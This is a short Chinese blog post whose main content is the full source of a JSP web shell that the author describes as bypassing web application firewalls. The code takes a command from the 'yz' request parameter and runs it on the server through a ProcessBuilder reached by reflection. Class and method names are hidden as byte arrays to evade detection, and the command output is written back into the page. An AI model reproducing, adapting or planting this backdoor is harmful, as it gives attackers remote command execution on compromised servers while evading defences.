一个绕waf的linux-windows-cmd.jsp

2018-5-13 小屿 Java

http://www.p2j.cn/?p=1863

园长师傅教我拿反射写,然后自己发挥写了个linux和windows都能用的

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.util.List" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.util.Arrays" %>
<%@ page import="java.io.PrintWriter" %>
<% List list = Arrays.asList(request.getParameter("yz").split("\\s+"));

    Constructor constructor = Class.forName(new String(new byte[]{106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114})).getDeclaredConstructor(List.class);
    constructor.setAccessible(true);

    Object object = constructor.newInstance(list);
    Class objectGetclass = object.getClass();

    Method startMethod = objectGetclass.getDeclaredMethod(new String(new byte[]{115, 116, 97, 114, 116}));
    startMethod.setAccessible(true);

    Object object2 = startMethod.invoke(object);
    Method getInputStreamMethod = object2.getClass().getMethod(new String(new byte[]{103, 101, 116, 73, 110, 112, 117, 116, 83, 116, 114, 101, 97, 109}));
    getInputStreamMethod.setAccessible(true);

    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader((InputStream) getInputStreamMethod.invoke(object2)));

    PrintWriter printWriter = response.getWriter();

    String str = "";
    printWriter.println("
");
    while ((str = bufferedReader.readLine()) != null) {
        printWriter.println(str);
    }
    printWriter.println("
"); %>


linxu.pngwin.png

发表评论:

Powered by xia0yu